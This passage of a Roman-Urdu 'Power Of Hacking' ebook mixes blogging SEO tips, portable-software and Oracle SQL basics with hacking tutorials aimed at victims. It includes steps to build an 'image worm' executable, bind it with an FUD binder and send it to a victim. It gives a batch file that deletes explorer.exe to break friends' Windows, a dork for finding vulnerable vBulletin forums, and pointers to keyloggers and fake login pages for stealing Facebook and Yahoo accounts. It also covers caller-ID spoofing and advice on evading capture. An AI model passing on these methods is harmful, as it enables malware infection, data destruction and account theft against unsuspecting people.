Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree aam tor par jab ham search engine me koi keyword lagatay hain to show honay wala result diffrent type ki discription, aor selected powerfull keyword show hotay hain, jo k site k owner nay site me add kiye hotay hain, yaani search engine ko apni site k baray batanay k liye meta tags hona laazmi hy, ye aap k page / post ko search engine daalnay k liye 1 khufia cheat ka kaam deta hain. jesay me kuch meta tags show kar raha hooon: (<)html> (<)head(>) (<)title(>)Come To Learn(<)/title(>) (<)meta name="discription" content="world's best blog for learning computer seo blogging mobiles networks networking"(>) (<)meta name="keywords" content="alexa booster zong ufone warid jazz telenor tips and tricks 2013 2014 networking in urdu"(>) (<)/head(>) Note: aap nay () ko remove kar dena hy. yani ye symbols < / > ko bagair ( ) brackets k likhna hy... Famous Search Engine me apni site submition:is wakat dunya me hazaron ki taddad me search engine show ho chukay hain, magar famous Google, Yahoo & MSN hi hain. in teeno search engine me apni site submit karwanay k liye nechay diye huay links ko istamal karein: Google: http://www.google.com/addurl/?continue=/addurl Yahoo: http://submit.search.yahoo.com/free/request Live MSN: http://wearch.msn.co.in/docs/submit.aspx
DMOz Open Directory me submition:DMOz aik open directory project hy jahan aap apni site submit kartay hain, submition k baad DMOZ k editor aap ki site ki jaanch partal kartay hain, aor 1/2 din me aap ki site directory me shaamil ho jati hy, is ka faiyda ye hy k is directory me shamoliat k baad khud ba khud search engine ki nazar me aa jati hy, kion k baray search engine DMOZ me shaamil honay wali new website ko check karnay k liye apnay spiders bhejtay rehtay hain. 43 Things Website: ye 1 social network website hy, jahan log new year k liye new azam ka izhaar kartay hain, jesay k me 2014 me blogger say full earning kar raha hoon ga... me 2014 me apnay blog ko google k top pay laana chahta hoon, etc... is k baad jo log aap k topic k related hon gay wo wahan commenting bhi karein gay aor ap ki site bhi visit karein gay, jis ka aap nay izhaar kiya hy... Yahoo Answer: ye 1 ilmi community website hy, jahan log Computer, Health, Business & dosray topics Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 63
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree pay sawalat kartay hain, jin k jawab isi community k member dain gay jo jantay hoon gay. ap apni site k topic k mutabik sawalat search karein aor un ka answer post karein, answer me aap apni site ka link bhi post kar saktay hain. Commenting on other's sites: boht si site aesi hain jo k post k baad aap ko commenting ki ijazat deti hain. aap site me artical k baray me apni raye denay k liye comment kar saktay hain, aor ka feed back superb content hona chahiye, jo koi dosra visitor jab ap ka coment read karay to wo bhi majboor ho k apna comment kar sakay... OLX publicity: OLX.com 1 aesi site jahan pay aap apni site k mutalik ishtaharat show kar saktay hain, jesay k me apnay blog k baray suggestion pooch sakta hoon k kesa laga mera blog aor is me koi kam beshi hy to please mujhay bataein. is trah visitors bhi achay milein gay aor ap ki blogging bhi improve ho gi... AddThis.com:ye site aap ki site ko bookmarking k liye ziyada help karti hy. kuch aor bhi bookmarking sites hain jesay Stique, Digg,
StumbleUpon etc.... TwitterFeed: yehan say aap feed k through apni site ki new posts ko direct Twitter, Facebook, Linkedin say link kara saktay hain, aor bhi kaafi fayida hy k ye bhi ap ki SEO k liye ziyada best way social networking sites.... like facebook, twitter, friendistan.com & many others... Digit.com say aap ki site ki voting hoti hy k aap ki site per mojood content per li ja sakti hy, aor hazaron webmasters is me apni apni sites submit kartay hain. taa k ziyada voting ho aor ziyada visitors milein Youtube.com pay aap apni videos bana k share karein, jo k aap ko ziyada say ziyada orignal visotors milein... Hack Tutrial:HOW TO MAKE PORTABELE SOFTWARES LEARN IN URDU
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 64
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Friends aj main apko Portable software bnany ka tariqa btata hon. Portable softwares woh software hoty hain. Jin ko PC main install krny ke zarorat nain hote. Blky woh direct install kye bagair chal jaty hain. Portable software ka faida yeh hota hai. Ky ap usy USB main daal kr kisi b PC sy direct withoution installation ky run kr skty hain. Portable softwares ka aik yeh faida b hota hai. Ky hamin kuch softwares ke hafton ya maheno bad zarorat parti hai. Aur hm un software ko PC main install krky PC ke speed km aur space main kami paida kr daity hain. Jis sy hamary Pc ke performance kharab ho jate hai. Kuch friends kisi institute ke Lab ya office ka PC use krty hain aur wahan extra softwares install krny ke ijazat nain hote. Wahan Portable software kaam daity hain. Portable software 3 tariqo sy bnty hain. Pehla tariqa software ka backup, 2nd winrar software sy portable sofware bnana. Aur 3rd tariqa "thinstall software" sy Portble software bnana hai. pehla tariqa backup sy portable bnana. Is tariqy main hm pehly software ko install krty hain.. Aur C Program files main ja kr jahan woh sofware install hota hai uska pora folder copy krky kisi dosry drive main paste kr daity hain aur woh sofware hamara simple portable software bn jata hai. Ab ap chahen tu jo software ap ny instal kia tha. Uninstall kr dain. Yeh tariqa choty software kelye best hai. Ap software ko install kye bagair b "universal extractor" software sy software ko direct extract kr skty hain. Universal extractor ko install kren. Aur kisi b software ky setup.exe pr right click krky extract with universal extrack kr dain. Apky pas setup name ka folder ajai ga. Jis main us software ka sara data para hoga. Aur ap us data ko as a portable software use kr skty hain 2nd tariqa winrar sy portable software bnana hai. Winrar sy Portable software bnany ka faida yeh hai. K hm tamam portable data ke aik single file bna laity hain. Aur woh compress ho kr space b km laite hai. Winrar sy portable software bnany kelye hm pehly backup wala method he use kren gain. agar ap ky pas winrar software hai tu thek hai. Nain tu install kr lain. Ab jis software ko Portable bnana hai usky folder main jain aur sary data ko select all kren aur right click krky add to archive pr click kren. Apky samny winrar ka menu ajai gai. Is main options, create SFX archive aur Create Sold archive ko ok kardain. Compression method ko best aur archive format ko rar krdain. ab general menu ky bad advance menu main jain aur sfx option pr kren. Ab ap ky saamny advance sfx option khul jai ga. Aur wahan text and icon p ke jaga software ky markazi program ka name likhe. For example setup="VLC.exe" aur last option load sfx icon from the file main software ky mutabiq koi acha sa icon select krky ok krdain. Apka 1st Portable software bn jay ga. winrar sy b backup waly tariqy ke tara sirf choty software sy he Portable software bnty hain. Kion ky bary software window ke Ragistry ky sath attach hoty hain. Aur in softwares ka kuch data window, common files, application data, ya kisi khas folder main Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 65
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree chala jata hai. Aur jb ap portable software bnaty hain. Tu kuch fill missing ho jate hain. Aur phr Program error daita hai aur run nain hota. Iska solution yeh hai ky ky jis file ka error dai unhain PC main search kr lain. Aur agar ap ny universal extractor sy software extrace kia hai. Tu woh error nai dai ga. thinstall sy portable software bnana sb sy asan hai. Aur ziada tr thinstall sy he portable software bnay jai jaty hai. sb sy pehly thinstall instal kren. Aur iska shourtcut thinApp setup capture desktop pr lain aur isy run kren. Welcome to setup capture ko next karen.yahan advance setting main ja kr jis drive main setup rkha hai jaise D drive Usy aur jis drive main software instal krna hai for example C usy check kr dain. Aur ok krky next kr dain. Presc0n ka progres start gojaega. Presc0n main thinstall apke pb ke registery ko read karega aur use apne mind main st0re kar lega. Aur next opti0n le aega. Ab thinstall ko minimize karen. Aur ap us s0ftware ko install karen. Jisko p0rtable banana hai. Install h0ne ke bad usko crack ya keygen ftc b laga kar full versi0n kar lain. Software install krny ky bad thinstall ko dobara maximized kren aur next pr click kr dain. Next krny ky bad thinstall Postscan ka menu aye ga. Postscan main thinstall pehly sy kye hoy Prescan ko Postcan ky sath compare krky check kry ga. Ky apky pc main kia tabdeele ai hai. Aur Pc ke ragistry main kia new entries ain hain. Post scan krny ky bad next menu main hamin result show kr dai ga. result waly menu main apko ms dos, ragistry, aur internet ka icon nazar ain gain. Inhain ignore kr dain. Insky sath ap ny jis software ko install kia hai. Usky, main programs nazar ain gain. Jinke extention .exe ho ge. Ab usmain, main Program ko select kren. For example ap ny VLC mediaplayer ko Portable bnana hai. Tu apky saamny VLC.EXE show hoga usy check lagain. Aur next krdain. next menu main sandbox location main user profile ko ok kr dain next pr click krdain. Marged isolation mode ko ok he rehny dain. Compression ke option apke choice hai. Jo b select krna chahen. Aur next kr dain. Creating a project start ho jai ga. Aur thinstall apky software ko copy krky aik new folder main ly ai ga.isky bad Last menu ai ga. Wahan bulild now ka bttn press karin apka sofware Portable bn jay ga. Aur browse project ke botton pr click krin. Yahan bohat sy folder show hon jain gain wahan bin naam ky folder main apka Portable software Mojod hoga. Kbi kbi hamary pass software ka setup nain hota. Blky pehly sy install hoa hota hai. Aur uska backup sirf hamary hota hai. Likin hm usy Portable bnana chahty hain.. Tu usky lye yeh krna hoga ky jb software installation ka menu ata hai tb. Ap us data ko copy kren aur kisi dosri drive main paste kr dain. Aur jis drive main paste krna hai. Us drive ko advance setting main pehly sy check b lagana hai. Taa ky jb thinstal scaning kry tu usy pata chal jai ky is drive main kuch copy hoa hai. Aur woh us data ko apny setup main lar kr us ka Portable bna dai ga. thinstall shorow main thora mushkil lagy ga. Likin 1, 2 try main apko iska tariqa kar samaj main ajai ga. Aur agar apko is lecture ke samaj b na aye tu ankhain band krky next next krty jain. Qismat ache hoe tu portable software hud he bn jai ga. ;-) Koshesh kren ky apny sath aik ragistry cleaner sofware b rkhen aur hr new prortable software bnany sy Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 66
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree pehly ragistry clean zaror kr lia kren tuneup utilites main be ragistry cleaner mojod hai. Portable software jb b bnain. Us waqat PC main koi aur kam na kren. Q k thinstall apky pc ke tamam activity ko save kr laita hai. Agar koi aur software ya data copy ya download ho raha ho. Tu woh b Portable software ky browse project main copy ho jata hai. Aur 3 mb ka software 103 mb ka bn jai ga. Browse folder main ap hud sy b search krky falto files delet kr skty hain. hamisha jb b portable software bnain. Kisi dosry pc ya apny dost ky pc main run krky zaror test kren. Ky ap ka software perfect kam krta hai ya nain. Kbi kbi koi file missing ka error daita hai. Tu ap woh file apny pc main sy search krky portable software ky sath rkh dain. Software chal jai ga. portable software ke mazeed details check krny kelye itdunya.com main Software ky sectiom Portable softwarers categary main, 3 way of making portable software, Article post kia hai woh zaror check karin. ---EnD--Hack Tutrial:Vbulletin mai bugs nikaltae hain expert inko exploit boltae hain.Ache bugs private hotae hain.Ek purana exploit share karta hn.
This exploit is for vb 3.8.6.Faq.Php , naam bhi yehi hy. Aj kal takreban sb forum patch hain. Matlb is bugs se secure. Jb b bug public hota h tou patch ata h. Phelay apko ek web chayae hoge vbulletin 3.8.6 par. Find it by this dork. Powered by vbulletin 3.8.6. Yae apko dunya br k forum btai ga.Sirf indian forum chayae tou go0gle dork yae hoga. Powered by vbulletin site:.In then web khol k faq par click karen. And type database agar forum vuln hua data base ke info ajai ge samne. Newest vbulletin public exploit sqli vuln exploit h vb mai.Nam is 0 day exploit.Yae exploit group search sqli vuln ke tarha hy. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 67
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Sqli vuln vbulletin 4.0.3 to vb 4.1.3 tk the.Iska patch i ya.Par dubra vuln i.Nw ths is embarssing abt vb security.
Hack Tutrial:DATABASE MENAGEMENT ORACLE QUERIES IN URDU (intro) Every organization has some information needs. A library keeps alist of members, books, due dates, and fines. A company needs to save information about employees, departments, and salaries. These pieces of information are called data. Organizations can store data on various media and in different formats, such as a hard-copy document in a filing cabinet or data stored in electronic spreadsheets or in databases. A database is an organized collection of information. To manage databases, you need a database management system (DBMS). A DBMS is a program that stores, retrieves, and modifies data in databases on request. There are four main types of databases: hierarchical, network, relational, and (most recently) object relational. Oracle 10g features: 1- automatic database diagnostic monitor 2- segment space management 3- automatic SQLexecution memory 4- automatic storage manager 5- automatic undo managment 6- automatic workload repository 7- change-aware incremental backup 8- locally managed tablespaces 9- SQL access advisor 10- SQL tuning advisor.
Es men programming nai hoti. Database design hota hai. Accounting n banking ka b database he design hota hai. Lyk costumer name credit record,info etc save krne k lye. Aur ap ye kam krne k liye query likhte hen. Jise ye bacha programming keh rha hai.
Query1: ye select query ka syntax hai. Basic SELECT Statement • SELECT identifies the columns to be displayed • FROM identifies the table containing those columns Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 68
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree SELECT *|{[DISTINCT] column|expression [alias],...} FROM table; Query 2: In the syntax: SELECT is a list of one or more columns * selects all columns DISTINCT suppresses duplicates column??expression selects the named column or the expression alias gives selected columns different headings FROM table specifies the table containing the columns.. ---EnD--Hack Tutrial:HACK ADMINISTRATOR PASSWORD IN WINDOWS 7 & VISTA Ham Easily Windows k Administrator ka Password Remove kar saktay hain. is k liye hamein thori si technique use karni parti hy.
Kuch Steps share kar raha hoon, in ko step by step follow karin:
1.Click on START button and type LUSRMGR.MSC on search bar.. 2.Click on "Local Users and Groups(Local)" 3.Click on "Users" 3.Then Right Click On "Administrator" or "Guest' or your user name(ex- manoj), which you want to change password. 4."set password'. 5."proceed" 6.type password, confirm it 7.then restart your computer and see.... Warning : Jab ham Windows 7 me login hotay hain to ham Administrator k account say login nahi hotay aksar, kisi User account say log in hotay hain, Administrator ka account kisi special purpose k liye hi use kartay hain phir, wesay SP3 ki disk me Password remover tools bhi hotay hain, Windows XP Crystal type ki SP3 Windows ki Disk use kar lain phir, agar koi Direct Admin ka password remove karna ho. Kuch ziyada info chahiye to aap Comment kar dain. aap ko guide kar diya jaye ga.. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 69
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial:-ways and tools use facebook ma
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 70
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
CHANGE FACEBOOK SECURITY QUESTION IN URDU Boht say log hain jo Facebook ki security k baray me fikar mand rehtay hain. Straightly Facebook Security Question ko change karnay ka koi method nahi hy na hi koi option hy, agar kisi nay ap ka security question change kar diya to samjho aap ka account hack ho gaya.. Basicaly ye aap k account ka khufia raasta hy, aap ka account kisi na kisi email say linked ho, yani Hosting Servers pay aap ka account hona lazmi hy & us say ap ka account linked ho k login ho sakay jesay Yahoo, Hotmail, Gmail etc.... Ab aap apnay facebook ka Security Question Change karein, Follow These Steps:1: Login honay say pehlay Forgot Password pay click karein then apni Facebook id likhein 2: Select your profile and Click Reset My password Button. Select your recovery email addresses. 3: yahan say aap apna security qustion select karein 4: is k baad facebook say ap ki id pay email aye gi, usay confirm kar lain 5: Basicaly facebook say 2 emails aaein gi, 1 email reset password k liye & 2nd sirf ap ko nitify karanay k liye k ap k account ko check kiya ja raha hy. 6: Facebook will identify this as a hacking attempt and your profile will be locked down temporarily until you recover it. This is normal. You dont have to be panic anyways. 7: temporary locked honay k baad ap ko ap k old pc jahan say ap last time login hoay Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 71
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree thay wahan say confirmation mangay ga k ap us pc say log in hoon gay to hi ap ki id open ho gi. ye 1 kisam ka ip t race hota hy jahan say ap lagatar apni facebook id use kar rahay hain 8: Once you successfully confirm your identity. Facebook will let you change your secret question and recovery email addresses. wesay bhi kaafi security tips hain facebook profile security k liye magar after hack your email jab hacker ap ki id open karta hy to ap ka security question us k liye Question Mark ban jata hy. is liye ye ik ehm issue hy facebook profile ko secure karna k liye. Hack Tutrial:IMAGE WORM: HACK IMAGES ON REMOTE COMPUTER (PC) Image hack aik boht famous tareeka hy hacking me specialy Remote PC pay. ye software Nathan nay banaya hy aor ka tareeka istaamal bhi boht asan hy. Remote Computer say image hack karnay k liye WinSpy Keylogger bhi istamaal kar saktay hain. 1. isay DOWNLOAD karein aor apnay PC pay run karein.
2. Ab ham kisi bhi Picture ko muntakhib karein gay. wo Picture choose karein gay jo ham victum ko send karna chahtay hain. 3. jesay hi ye picture victom k pc me jaye gi , us k pc ki all images ap ki muntakhib ki hui image say Replace ho jaein gi. yaani us k pc ki all images change ho jaein gi.. sirf aap ki hi image har jagah usay nazar aye gi.. 4. ab image select karnay k baad "Build Worm" pay click karien gay. ye ik Server.exe file bana day ga. Note: ye server file apnay pc me run nahi karni, agar apnay PC me open karein gay to nuksaan apna hi ho ga :) agar apnay pc pay hi run kar k check karna chahtay hain to pehlay apnay pc pay Deep Freeze Software hona lazzmi hy. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 72
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 5. ab Server.exe file ko kici dosri .exe k saath bind kar dain, FUD Binder use kar lain binding k liye. ab apnay dost/victom ko file bhejin , aor osay open karnay k liye kahien. jesay hi wo file open karay ga hamara server file silently install hona shuru ho jaye ga. us ki images ab auto replace hona shuru ho jaein gi. is traha ap us k pc ki all images hack kar saktay hain.. Note: Server.exe file ko work karnay me thora time lag sakta hy. is liye ziyada jaldi karnay ki zarorat nahi, jesay hi us k pc me file open ho gi to silently install k baad working me bhi time lagay ga, kion k her pc ki configuration alag alag hoti hy is liye. Me nay images hack karnay ki koshih ki thi to ye 100% work kar raha tha, isi liye app doston k saath share kar raha hoon, agar aap ko kahien bhi installation me ya sending/uploading me problam ho to mujhay comments me bata dain, me ap ko batata rahon ga.
Hack Tutrial:SAVE AND PROTECT YOURSELF FROM HACKERS (ANTI-HACKING) HACKING RULES SAFETY TIPS SEREIES HACKING RULES: 1.APNE COMPUTER KA IP ADDRESS CHANGE KAR DEN. 2."HIDE IP ADDRESS " SOFTWARE WWW . MSHQIT . COM IS SITE KE "HACKING TOOLS" WALEY PAGE PER MOJOD HAI INSTALL KAR LEN . 3.K ABHI KISI SYSTEM KO DAMAGE MAT KIA JIYE . 4.K ABHI KISI KO APNE HAKCING PROJECTS KE BAARE MAIN MAT BATAYIYE SIWAYE UN KE JIN PER AP
5.K ABHI KISI KA REAL NAME YE PHIR REAL PHONE NUMBER USE NA KAREN. 6.G OVERMENT KE COMPUTER HACK MAT KAREN . 7.APNE GHAR KI PHONE - LINE PER KABHI BHI KISI SE HACKING PROJECTS KE BAARE MAIN BAAT NA KAREN . 8.APNE HACKING MATERIALS SAFE JAGAH PER RAKHEN . YA KUCH KHAAS HACKING RULES THAY JO MAIN NAY BATAYEN HAIN . FOLLOW THESE RULES AND BE SAFE . JIS ID SE AP NE BLOG , SITE BNAYE HN WO ALG BNAYEN . JB KSI KO MAIL WGAIRA KREN YA F ACEB OOK PY A/ C BNAYEN US K LIA ALG A/ C HNA CHIA. OR AGR AP K BLOG / SITE WALI ID PR APKO KOI FILE BHEJE USY OPEN MT KARY. NI TO APKA BLOG GIA . BLOG ISI TARIQE SE HACK HO SKTA HA R KSI TRIQE SE NI HO SKTA. HN ALBATA SITE HOSAKTI HA. WWW . HEXOREDITION . TK PY JA KE SAFETY PRECUATION PAGE PAY TOP TEN REASON WHICH SITES HACKED PARHEN & SECURE YOUR SITE . APNI FACEBOOK ID KO HACK HONE SE BCHANE K LYE, FACEBOOK SCANNER , APNI FB ID MAIN INSTALL KREIN , U CAN DOWNLOAD FACEBUK SCANER 4RM WWW . MSHQIT . COM .... CLICK ON SAFETY PRECUATION AND DOWNLOD IT . YEH AP KI ID KO SCAN KRTA RAHE GA. KABI BI APNI EMAIL ID PER FAZUL MAIL KI AAYI HUI FILES , PIC, MUSIC, LINK, OPEN MAT KARN . AKSAR KO BHAROSA HA
EMAIL AATI HN TO LIKHE HOTA HAI CLICK AND GET PRIZE FLAN FLAN TO ISS SE APKE ID HACK
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 73
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree O SAKTI HAI . AGAR KOI FILE YA PIC AP NE DEKHNI B HAI TO USEY APNI EMAIL PR OPEN MAT KREN DOWNLOAD KER KE WW. VIRUSTOTAL . COM PEY UPLOAD KRN AGAR YEH SITE BOLE VIRUS HAI TO OPEN MAT KREN. APNE
DSL CONNECTION KA USER AND PASSWORD CHANGE KR DEN TAA KE KOI APKA DSL H ACK NA KAR SAKE , FACEBOOK YA KISI OR JAGAH DUSHMAN SE APNA IP CHANGE KAR KE CHATTING KAREN , APNE MOBILE KA BLUETOOTH BILAWAJAH ON NA RAKHEN BECAUSE ''B LUETOOT HACKER " TOOL SE APKA CELL KE CONTACTS , MSG, PICTURES ETC SUB DOSRE KE CONTROLS MAIN AA SAKTE HAIN . KABI REMEMBER PASSWORD PER CLICK MAT KARN Q KE APKE DOST WGAIRA COOKIES MAIN SE PASSWORD DEKH SAKTE HAIN. OR COOKIES KO DELETE KARTE RAHEN HAR BAR SAVE MAT RAKEN Q KE VICTUM NE HAMEN ISTEALER WALI FILE BEJ B DI TO KUCH NI AE GA US K PAS Q KE HAMARI COOKIES MAIN KOI PASSWORD SAVE NI HO GA. HAMESHA APNE
EMAIL WALA F ACE BOOK ID PER SAME MAT RAKHEN , EMAIL ID WALA OR PASSWORD OR FACEBOOK ID WALA DOSRA PASSWORD RAKHEN TAA KE AGAR F ACEBOOK ID HACK HO B JAYE TO APKI EMAIL H ACK NA HO Q KE US KA PASSWORD KUCH OR HO GA OR VICTUM APKI EMAIL MAIN ENTER HO KE APKA PASSWORD CHANGE NI KR SAKE GA, PHR FB ID HACK HONE PASSWORD APNI
KI SURAT MAIN AP FORGET PASSWORD PE CLICK KR KE APNA PASSWORD APNI EMAIL PER MANGWA SAAKTE HAIN . JUB AP APNI SITE BANAYEN TO APKI
EMAIL PER AIK MAIL AATI HAI KE APKI SITE BAN CHUKI AI AND YEH APKA ADMIN LOGIN ID AND PASSWORD HAI . YEH WALA MAIL HARGIZ APNI EMAIL INBOX MAIN MAT RAKHEN Q K ID H ACK HO JANE KA BAAD APKI SITE HIJACK HO JAE GI MEAN VICTUM APKI SITE KO APNI SITE BANA LE GA APK ADMIN LOGIN KI ID AND PASSWORD CHANGE KR KE. HACKING KARTE HUWE SAFETY TIPS ZAROOR APNAYEN CHAHE WO CHOTI C H ACKING HO YA BARI H ACKING. HACKING HMESHA H ACKING HOTI HAI PAKRE JANE KI SURAT MAIN....1.SENT TO JAIL .2.SHOT .3.NO COMPUTER OR TELEPHONE FOR THE REST OF YOUR LIFE.4.NO COLLEGE . 5.NO J OB. 6.NO M ONEY .7.NO LIFE. 8M ORAL OF THE STORY IS "BE SAFE ". . . .! Hack Tutrial:( C ) DRIVE BACKGROUND WITH YOUR PHOTO
Now i share a new post.my post is boring with your drive background color, which always white. you can change it to more live with your picture or your photo. so when you open the drive like drive C:, the background isn't white but your image like that. also you can implement it on your flash drive.it will very nice How work it :1.At first open your notepad2.Than type or copy several code like below [ExtShellFolderViews] {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A400C04FD706EC} [{BE098140-A513-11D0-A3A4-00C04FD706EC}] Attributes=1 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 74
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree IconArea_Image=3.jpg ---> your image IconArea_Text=1000x000f00001 [.ShellClassInfo] ConfirmFileOp=0 3. Save it as desktop.ini, and save in drive you like. example drive d: 4. Copy your image file to same location 5. Open your drive from explorer or just open it from my-computer 6. So see the nice image show as background
Hack Tutrial:Disable turnoff button in Windows Disable turn off button in Windows XP: Simply ye method Windows XP me hi use hota hy kion k is me XP k Path show kiya gaya hy 1. Start button and type regedit in Run option then press Enter for next. 2. Here locate the location to: HKEY§CURRENT§USER?/Software?/Microsoft?/Windows?/Curre ntVersion?/Policies?/Explorer 3. Here in right side panel, right click to create a new DWORD value with the name NoClose. 4. Now assign number 1 in value data box and close the registry editor. 5. Now close the registry editor and restart your computer after any changes to go into effect
Hack Tutrial:Computer Tricks:1) Amazing pc trick open ms word and koi b word type kro os ko select kr k win+s press kro jo b aap ne likha hoga pc aap ko bol k batayega.try2) P.C ki start up speed fast karin , open notepad & write 80000000 & save as ram.vbs3) P.C speed up RUN > msconfig > startup > disable all (Services hide microsoft) > Restart4) P.C Updates: Hardware & Software check karney k liye, goto RUN > msinfo32 > Enter5) P.C ki drives ko temporary and unnecessory files sy clean karney k liye goto RUN and Write "cleanmgr" and click ok6) Connect to NET. open RUN and type the following "talnettowel.blinkenlights.nl" without commas and enjoy Movie in Dos command.7) XP mein Folder icon or Backgruound Change karney k liye Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 75
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree LOVELY FOLDER- name k liye woftware use karein. 8) kisi ki window currupt karni ho to Open note pad Type Del C:/windows/explorer.exe save as hehehe.bat Desktop pey rakh lain, open kartey hi window crupt.9) GET 1000 VISITERS FOR UR SITE http://bit.ly/h0yFlb 10) Alternate For Copy & Paste shortcut for copy = Ctrl+Insert For Past = Shift + insert 11) Windows Curpeted or deleted files k liye insert xp ck in cdroom goto start then typw "sfc/scannow" it should fix all curpted files 12) Window media playe doran e video kisi khas jagah ki pic lenay k liye Video ko pause karein and then pres CTRL+I and save pic 13) P.C ko Deadly Slow krne wale viruses jo Taskmgr k Proces Mai Daikhe ja skte Hain. un k Names ye hen. "RUNOUCE.EXE" "REGSVR.EXE. 14) Administrator ka pasword remove karney k liye limited account k run mein type "secpol.msc" and enter now change p.w 15) Apne Frnds ki window urani hai. . Open note pad. . Type: Del C:/windows/explorer.exe Save as.bat Desktop pe rakh do.Jo open kre ga to window delETe16) use your USB as ram. Make sure ur USB is empty, Attatch it to P.C, Rename as Ram Drive, Then go to Systen from Control Panel, then goto Advance, click setting under performance, On cache click change then click on the USB Drive then chose system managed, After that ok then Restart ur p.c only for XP Windows17) Make CON Folder: in RUN > CMD > show comand prompt write here MKDIR C:/CON/Foler Ready. To Delete it type in commad RMDIR C:/CON/18) Show Rename of google place of google site, just open www.goglogo.com , here u rename your own name.19) P.C Ko speed up karnay k liye HKEY_CURRENT_USER\Control Panel\Desktop\Menu show delay right click on Modyify then reduce the number "2"20) Make a crazy virus, Open notepad type STAR & in every new line type Start nd save this file as name.vbs click on it and c magic. 21) How To call your Friends From their own Cell Number. 1st go mobivox.com yahan Apna Acount Bnain Note:Acount bnaty waqt victum ka Mobile Number likhen. After Succesful registration Login your Acount Enter Victum number and call. Victum will Recieve call from his own number with shocking.END 22) AGr ap apne mobile ka security code bhool gye he then just check this sites: http://t.co/PWautjMg http://t.co/tqA8ItmT 23) FOR COMPUTER GAMES these softwares must be required 1).DIRECTx 2).DIRECTX 9.0 (3d acceleration) 3).OpenAL 4).NEVIDIAx 5).NEVIDIAx 9.1 Fir 24) How To Hack A Yahoo Messenger's Password ? 1:with Mps Jo Easy hai. 2:with Keylogger ,sa App Facebook,Msn etc b hack kar sakta ho. 3: fake page Hai isi sa app B yahoo,facebook,msn etc hack kar sakta ho lakin sub k Fake page different hai Ye nishan jhan hai whan just enter pres krna hai ye type na kr dna >4. . 5 lines hain. Words daikh lo case sensitive hai. Jese whan likhe hn same usi tara capital smal leter use krne hn. .AGR Ap kisi ka B(Facebok,yaho)Acount Hack krna Chahty ha To Downlod This Software"LOGIN SPOOFER"Make Fake Pages & Hack 0ther's Account25)mobile K Liye New Picture Message Bnany Ka Software Apne Computer Se Fre Download Krn; pocketpc.freeware.mobi/download-sms-draw-1-0.html26) Download 625 JAVA Games 4 all Mobile Phones VisiT http://t.co/CTufVzW . 27) hide ip adress easy with crack tinyurl.com/iphide9 28) php programming basics. click http://t.co/9egrznyO 29) hacking with wireshark full tutorial http://t.co/nRcZ4zYU 30) how to download your facebook data: http://ow.ly/5X0Kl 31) www.convertfiles.com is site sy aap youtube vidoe ksi bhi formate mein download karein.33) iF u wants To Get Any "SERIAL NUMBER" to "UNLOCK" Any Pc Software: Then "CHECK" This "SITE" http://t.co/ySSLrvU8 a Huge Collection..! 34)Ufone Daily SMS: 500 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 76
